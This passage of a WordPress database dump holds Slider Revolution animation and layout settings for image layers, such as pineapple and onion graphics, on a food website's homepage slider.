To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":2100,\"startRelative\":220,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"Image 7\",\"alias\":\"Image 7\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic6.png\",\"imageId\":1083},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"441px\"},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"357px\"},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"originalWidth\":441,\"originalHeight\":357,\"aspectRatio\":{\"d\":{\"v\":1.23529411764705887577520115883089601993560791015625},\"n\":{\"v\":1.23529411764705887577520115883089601993560791015625},\"t\":{\"v\":1.23529411764705887577520115883089601993560791015625},\"m\":{\"v\":1.23529411764705887577520115883089601993560791015625}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":460},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"10\":{\"text\":\"Image 8\",\"alias\":\"Fired\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic7.png\",\"imageId\":1084},\"size\":{\"width\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"originalWidth\":165,\"originalHeight\":165,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"319px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-278px\",\"e\":true},\"n\":{\"v\":\"-186px\",\"e\":true},\"t\":{\"v\":\"-265px\",\"e\":true},\"m\":{\"v\":\"-187px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":780},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":770,\"start\":2100,\"startRelative\":-180,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(7,3,4,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/back-papaya.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"01\"}]},\"timeline\":{\"transition\":[\"slideoverright\"],\"slots\":[\"default\"],\"duration\":[\"80\"]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Ananas\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-1.png\",\"imageId\":2538},\"size\":{\"width\":{\"d\":{\"v\":\"364px\",\"e\":true},\"n\":{\"v\":\"364px\"},\"t\":{\"v\":\"363px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"368px\",\"e\":true},\"n\":{\"v\":\"368px\"},\"t\":{\"v\":\"367px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":504,\"originalHeight\":515,\"aspectRatio\":{\"d\":{\"v\":0.97864077669902915790345332425204105675220489501953125},\"n\":{\"v\":0.97864077669902915790345332425204105675220489501953125},\"t\":{\"v\":0.97864077669902915790345332425204105675220489501953125},\"m\":{\"v\":0.97864077669902915790345332425204105675220489501953125}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"t\":{\"v\":\"-55px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":840,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Onion\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-2.png\",\"imageId\":2539},\"size\":{\"width\":{\"d\":{\"v\":\"564px\",\"e\":true},\"n\":{\"v\":\"467px\",\"e\":true},\"t\":{\"v\":\"351px\",\"e\":true},\"m\":{\"v\":\"236px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"408px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"170px\",\"e\":true}},\"originalWidth\":639,\"originalHeight\":422,\"aspectRatio\":{\"d\":{\"v\":1.514218009478673021561689893133006989955902099609375},\"n\":{\"v\":1.514218009478673021561689893133006989955902099609375},\"t\":{\"v\":1.514218009478673021561689893133006989955902099609375},\"m\":{\"v\":1.514218009478673021561689893133006989955902099609375}}},\"position\":{\"x\":{\"d\":{\"v\":\"51px\",\"e\":true},\"n\":{\"v\":\"50px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-158px\",\"e\":true},\"n\":{\"v\":\"-90px\",\"e\":true},\"t\":{\"v\":\"-20px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":260},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":10,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"sp